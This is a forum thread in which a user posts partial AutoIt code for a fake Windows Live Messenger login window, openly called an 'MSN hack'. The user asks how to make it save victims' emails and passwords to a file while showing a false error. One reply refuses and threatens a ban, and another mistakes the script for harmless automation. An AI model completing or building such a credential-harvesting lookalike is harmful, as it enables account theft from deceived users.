Jump to content

Finishing Touches


do3z
 Share

Recommended Posts

Hey The Following Code Is :\ Well A Msn Hack :\ I Don't Know If You Will Help Me I Hope You Will I Have Done Whats There So Fare Of Cause There Is A Image There That You Wouldn't See Its On My PC But What I Need Help With Is When Someone Types There Email And Password And Clicks Sign In I Want The Sign In Button To Generate A New *.txt File In The Same Folder As The *.exe File I Want To Have The Email And Password In It So How It Works

Type Email And Password Click Sign In (Like Normal MSN Messenger). But The Sign In Button Doesn't Sign In Just Comes Up With Fail Message But It Also Generates The *.txt Document I Mentioned Before With The Email And Password Inside?? So What I Am Asking Is If Someone Could Help Me Out By Getting Me The Code Or Finishing This Of For Me?? Thanks A Billion <3

CODE
;Include constants

#include <GUIConstants.au3>

;Initialize variables

Global $GUIWidth

Global $GUIHeight

$GUIWidth = 265

$GUIHeight = 595

;Create window

GUICreate("Windows Live Messenger", $GUIWidth, $GUIHeight)

;Create an "OK" button

$OK_Btn = GUICtrlCreateButton("Sign In", 98, 428, 70, 24)

;Create a "CANCEL" button

$Cancel_Btn = GUICtrlCreateButton("Cancel", 1165, 2110, 7110, 1125)

; INPUT

GuiCtrlCreateInput("", 24, 196, 218, 21)

$InputPass = GuiCtrlCreateInput('', 24, 240, 218, 21, 0x20)

; CHECKBOX

GuiCtrlCreateCheckbox("Remember Me", 28, 318, 0, 0)

GuiCtrlSetState(-1, $GUI_CHECKED)

; CHECKBOX

GuiCtrlCreateCheckbox("Remember My Password", 28, 344, 0, 0)

GuiCtrlSetState(-1, $GUI_CHECKED)

; CHECKBOX

GuiCtrlCreateCheckbox("Sign Me In Automatically", 28, 370, 0, 0)

GuiCtrlSetState(-1, $GUI_CHECKED)

; PIC

GuiCtrlCreatePic("Background.gif", 0, -20, 0, 0)

GuiCtrlCreateLabel("", 1000, 1000, 1000, 1000)

GuiCtrlSetColor(-1,0xffffff)

;soundplay ("song1.mp3" [, 2] )

;Show window/Make the window visible

GUISetState(@SW_SHOW)

;Loop until:

;- user presses Esc

;- user presses Alt+F4

;- user clicks the close button

While 1

;After every loop check if the user clicked something in the GUI window

$msg = GUIGetMsg()

Select

;Check if user clicked on the close button

Case $msg = $GUI_EVENT_CLOSE

;Destroy the GUI including the controls

GUIDelete()

;Exit the script

Exit

;Check if user clicked on the "OK" button

Case $msg = $OK_Btn

MsgBox (64, "Windows Live Messenger", "Windows Live Messenger could not sign you in because the window live ID you entered does not exist or is incorrect. If your have forgotten your password, click forgot your password? at the bottom of the main Messenger window. Error code: 80048823")

EndSelect

WEnd

Edited by big_daddy

Google Is For Real Men. Yahoo Is For Wimps!

Link to comment
Share on other sites

No one here is going to help you write a script to capture passwords. I am pretty sure that Smoke_N has already warned you about Writing Like This All The Time Too.

Drop the subject of password captures or risk being banned form the forum.

Support bacteria; it's the only culture most people have.LxP's Learning to Script with AutoIt 3 - Excellent starting placeVolly's Links Page - Links to cool and useful scriptsAutoIt Wrappers - Valuater's AutoIt Wrappers post. Lots of good stuff.Support AutoIt - Make a donation here; I did.[size="2"]#include <Guinness.pint>[/size]

Link to comment
Share on other sites

I don' get why would this be malicious.

As far as I can see he is trying to automate MSN login.

I'm sure that possible users of this script (program) will be notified of what it does before using it.

What I'm interested in is why is he/she using capital letter for every new word in his post? That's kind of, you know, harder :)

anyways...

♡♡♡

.

eMyvnE

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...